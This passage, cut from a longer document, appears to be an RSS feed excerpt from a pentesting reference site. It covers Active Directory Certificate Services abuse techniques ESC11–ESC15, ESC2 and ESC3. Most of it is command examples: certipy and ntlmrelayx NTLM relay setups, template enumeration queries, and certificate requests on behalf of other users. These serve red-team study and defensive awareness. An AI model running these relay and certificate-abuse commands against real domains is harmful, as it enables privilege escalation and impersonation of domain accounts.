&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;certipy&lt;/span&gt; &lt;span class="n"&gt;find&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt;&lt;span class="nv"&gt;@dc1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;lab&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;REDACTED&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-dc-ip&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt; &lt;span class="n"&gt;-stdout&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;Enforce&lt;/span&gt; &lt;span class="n"&gt;Encryption&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;Requests&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Disabled&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;ESC11&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Encryption&lt;/span&gt; &lt;span class="n"&gt;is&lt;/span&gt; &lt;span class="n"&gt;not&lt;/span&gt; &lt;span class="n"&gt;enforced&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;ICPR&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;RPC&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Setup a relay using Impacket ntlmrelay and trigger a connection to it.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;certipy&lt;/span&gt; &lt;span class="n"&gt;relay&lt;/span&gt; &lt;span class="n"&gt;-target&lt;/span&gt; &lt;span class="n"&gt;rpc&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;dc&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;domain&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="n"&gt;-ca&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;DOMAIN-CA&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-template&lt;/span&gt; &lt;span class="n"&gt;DomainController&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# or&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;ntlmrelayx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;-t&lt;/span&gt; &lt;span class="n"&gt;rpc&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt; &lt;span class="n"&gt;-rpc-mode&lt;/span&gt; &lt;span class="n"&gt;ICPR&lt;/span&gt; &lt;span class="n"&gt;-icpr-ca-name&lt;/span&gt; &lt;span class="nb"&gt;lab-DC&lt;/span&gt;&lt;span class="n"&gt;-CA&lt;/span&gt; &lt;span class="n"&gt;-smb2support&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Coerce authentication fomr a privileged account such as a Domain Controller.&lt;/p&gt;</description></item><item><title>Active Directory - Certificate ESC12</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc12/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc12/</guid><description>&lt;h2 id="esc12---adcs-ca-on-yubihsm" class="anchored-heading"&gt;ESC12 - ADCS CA on YubiHSM&lt;a class="heading-anchor" href="#esc12---adcs-ca-on-yubihsm" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;The ESC12 vulnerability occurs when a Certificate Authority (CA) stores its private key on a YubiHSM2 device, which requires an authentication key (password) to access. This password is stored in the registry in cleartext, allowing an attacker with shell access to the CA server to recover the private key.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Requirements&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;CA certificate&lt;/li&gt;
&lt;li&gt;Shell access on the root CA server&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Exploitation&lt;/strong&gt;:&lt;/p&gt;</description></item><item><title>Active Directory - Certificate ESC13</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc13/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc13/</guid><description>&lt;h2 id="esc13---issuance-policy" class="anchored-heading"&gt;ESC13 - Issuance Policy&lt;a class="heading-anchor" href="#esc13---issuance-policy" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;If a principal (user or computer) has enrollment rights on a certificate template configured with an issuance policy that has an OID group link, then this principal can enroll a certificate that allows obtaining access to the environment as a member of the group specified in the OID group link.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Requirements&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The principal has enrollment rights on a certificate template&lt;/li&gt;
&lt;li&gt;The certificate template has an issuance policy extension&lt;/li&gt;
&lt;li&gt;The issuance policy has an OID group link to a group&lt;/li&gt;
&lt;li&gt;The certificate template defines EKUs that enable client authentication&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&amp;gt;&lt;/span&gt; &lt;span class="nv"&gt;$ESC13Template&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;Get-ADObject&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;CN=ESC13Template,&lt;/span&gt;&lt;span class="nv"&gt;$TemplateContainer&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-Properties&lt;/span&gt; &lt;span class="n"&gt;nTSecurityDescriptor&lt;/span&gt; &lt;span class="nv"&gt;$ESC13Template&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;nTSecurityDescriptor&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;Access&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="p"&gt;?&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;IdentityReference&lt;/span&gt; &lt;span class="o"&gt;-eq&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;DUMPSTER\ESC13User&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;AccessControlType&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Allow&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# check if there is an issuance policy in the msPKI-Certificate-Policy&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Get-ADObject&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;CN=ESC13Template,&lt;/span&gt;&lt;span class="nv"&gt;$TemplateContainer&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-Properties&lt;/span&gt; &lt;span class="nb"&gt;msPKI-Certificate&lt;/span&gt;&lt;span class="n"&gt;-Policy&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;msPKI-Certificate&lt;/span&gt;&lt;span class="n"&gt;-Policy&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="mf"&gt;1.3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;6&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;4&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;311&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;21&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;8&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;4571196&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;1884641&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;3293620&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10686285&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;12068043&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;134&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;3651508&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mf"&gt;12319448&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# check for OID group link&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Get-ADObject&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;CN=12319448.2C2B96A74878E00434BEDD82A61861C5,&lt;/span&gt;&lt;span class="nv"&gt;$OIDContainer&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-Properties&lt;/span&gt; &lt;span class="n"&gt;DisplayName&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nb"&gt;msPKI-Cert&lt;/span&gt;&lt;span class="n"&gt;-Template-OID&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nb"&gt;msDS-OIDToGroupLink&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;msDS-OIDToGroupLink&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;CN&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;ESC13Group&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;OU&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;Groups&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;OU&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;Tier0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;DC&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;dumpster&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;DC&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;fire&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# verify if ESC13Group is a Universal group&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Get-ADGroup&lt;/span&gt; &lt;span class="n"&gt;ESC13Group&lt;/span&gt; &lt;span class="n"&gt;-Properties&lt;/span&gt; &lt;span class="n"&gt;Members&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;GroupScope&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Universal&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;Members&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Exploitation&lt;/strong&gt;:&lt;/p&gt;</description></item><item><title>Active Directory - Certificate ESC14</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc14/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc14/</guid><description>&lt;h2 id="esc14---altsecurityidentities" class="anchored-heading"&gt;ESC14 - altSecurityIdentities&lt;a class="heading-anchor" href="#esc14---altsecurityidentities" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;ESC14 is an Active Directory Certificate Services (ADCS) abuse technique that leverages the altSecurityIdentities attribute to perform explicit certificate mappings. This attribute allows administrators to associate specific certificates with user or computer accounts for authentication purposes. However, if an attacker gains write access to this attribute, they can add a mapping to a certificate they control, effectively impersonating the targeted account.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Domain administrators can manually associate certificates with a user in Active Directory by configuring the altSecurityIdentities attribute of the user object. This attribute supports six different values, categorized into three weak (insecure) mappings and three strong mappings.&lt;/p&gt;</description></item><item><title>Active Directory - Certificate ESC15</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc15/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc15/</guid><description>&lt;h2 id="esc15---ekuwu-application-policies---cve-2024-49019" class="anchored-heading"&gt;ESC15 - EKUwu Application Policies - CVE-2024-49019&lt;a class="heading-anchor" href="#esc15---ekuwu-application-policies---cve-2024-49019" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;This technique now has a CVE number and was patched on November 12, See &lt;a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49019"&gt;Active Directory Certificate Services Elevation of Privilege Vulnerability - CVE-2024-49019&lt;/a&gt; for more information.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Requirements&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Template Schema&lt;/strong&gt; Version 1&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ENROLLEE_SUPPLIES_SUBJECT&lt;/strong&gt; = &lt;code&gt;True&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Exploitation&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;Detect the vulnerability from BloodHound data using the following cypher query.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;MATCH&lt;/span&gt; &lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;=(&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;Base&lt;/span&gt;&lt;span class="p"&gt;)-[&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;MemberOf&lt;/span&gt;&lt;span class="p"&gt;*&lt;/span&gt;&lt;span class="mf"&gt;0&lt;/span&gt;&lt;span class="p"&gt;..]-&amp;gt;()-[&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;Enroll&lt;/span&gt;&lt;span class="p"&gt;|&lt;/span&gt;&lt;span class="n"&gt;AllExtendedRights&lt;/span&gt;&lt;span class="p"&gt;]-&amp;gt;(&lt;/span&gt;&lt;span class="n"&gt;ct&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;CertTemplate&lt;/span&gt;&lt;span class="p"&gt;)-[&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;PublishedTo&lt;/span&gt;&lt;span class="p"&gt;]-&amp;gt;(&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;EnterpriseCA&lt;/span&gt;&lt;span class="p"&gt;)-[&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;TrustedForNTAuth&lt;/span&gt;&lt;span class="p"&gt;]-&amp;gt;(&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;NTAuthStore&lt;/span&gt;&lt;span class="p"&gt;)-[&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;NTAuthStoreFor&lt;/span&gt;&lt;span class="p"&gt;]-&amp;gt;(&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;Domain&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="nb"&gt;WHERE &lt;/span&gt;&lt;span class="n"&gt;ct&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;enrolleesuppliessubject&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;True&lt;/span&gt; &lt;span class="n"&gt;AND&lt;/span&gt; &lt;span class="n"&gt;ct&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;authenticationenabled&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;False&lt;/span&gt; &lt;span class="n"&gt;AND&lt;/span&gt; &lt;span class="n"&gt;ct&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;requiresmanagerapproval&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;False&lt;/span&gt; &lt;span class="n"&gt;AND&lt;/span&gt; &lt;span class="n"&gt;ct&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;schemaversion&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mf"&gt;1&lt;/span&gt; &lt;span class="k"&gt;RETURN&lt;/span&gt; &lt;span class="n"&gt;p&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;strong&gt;Application Policies&lt;/strong&gt; extension is a proprietary certificate extension with the OID &lt;code&gt;1.3.6.1.4.1.311&lt;/code&gt;, same as &lt;strong&gt;x509 EKUs&lt;/strong&gt;. It was designed to allow users to specify additional use cases for certificates by utilizing the same OIDs as those in the Enhanced Key Usage extension.
If there is a conflict between an Application Policy and an EKU, then Microsoft prefers the proprietary Application Policy.&lt;/p&gt;</description></item><item><title>Active Directory - Certificate ESC2</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc02/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc02/</guid><description>&lt;h2 id="esc2---misconfigured-certificate-templates" class="anchored-heading"&gt;ESC2 - Misconfigured Certificate Templates&lt;a class="heading-anchor" href="#esc2---misconfigured-certificate-templates" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Requirements&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Allows requesters to specify a Subject Alternative Name (SAN) in the CSR as well as allows Any Purpose EKU (2.5.29.37.0)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Exploitation&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Find template&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Get-ADObject&lt;/span&gt; &lt;span class="n"&gt;-LDAPFilter&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;(&amp;amp;(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-SearchBase&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;CN=Configuration,DC=megacorp,DC=local&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# or&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;python&lt;/span&gt; &lt;span class="n"&gt;bloodyAD&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;john&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;doe&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Password123!&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-host&lt;/span&gt; &lt;span class="mf"&gt;192.168&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;100&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;1&lt;/span&gt; &lt;span class="n"&gt;-d&lt;/span&gt; &lt;span class="n"&gt;bloody&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;lab&lt;/span&gt; &lt;span class="n"&gt;get&lt;/span&gt; &lt;span class="n"&gt;search&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-base&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;CN=Configuration,DC=megacorp,DC=local&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-filter&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;(&amp;amp;(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Request a certificate specifying the &lt;code&gt;/altname&lt;/code&gt; as a domain admin like in &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-esc01/"&gt;ESC1 - Misconfigured Certificate Templates&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;</description></item><item><title>Active Directory - Certificate ESC3</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc03/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc03/</guid><description>&lt;h2 id="esc3---misconfigured-enrollment-agent-templates" class="anchored-heading"&gt;ESC3 - Misconfigured Enrollment Agent Templates&lt;a class="heading-anchor" href="#esc3---misconfigured-enrollment-agent-templates" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;ESC3 is when a certificate template specifies the Certificate Request Agent EKU (Enrollment Agent). This EKU can be used to request certificates on behalf of other users&lt;/p&gt;
&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Request a certificate based on the vulnerable certificate template ESC3.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;certipy&lt;/span&gt; &lt;span class="n"&gt;req&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;corp.local/john:Passw0rd!@ca.corp.local&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-ca&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;corp-CA&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-template&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;ESC3&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;[*]&lt;/span&gt; &lt;span class="n"&gt;Saved&lt;/span&gt; &lt;span class="n"&gt;certificate&lt;/span&gt; &lt;span class="n"&gt;and&lt;/span&gt; &lt;span class="n"&gt;private&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt; &lt;span class="n"&gt;to&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;john.pfx&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Use the Certificate Request Agent certificate (-pfx) to request a certificate on behalf of other another user&lt;/p&gt;
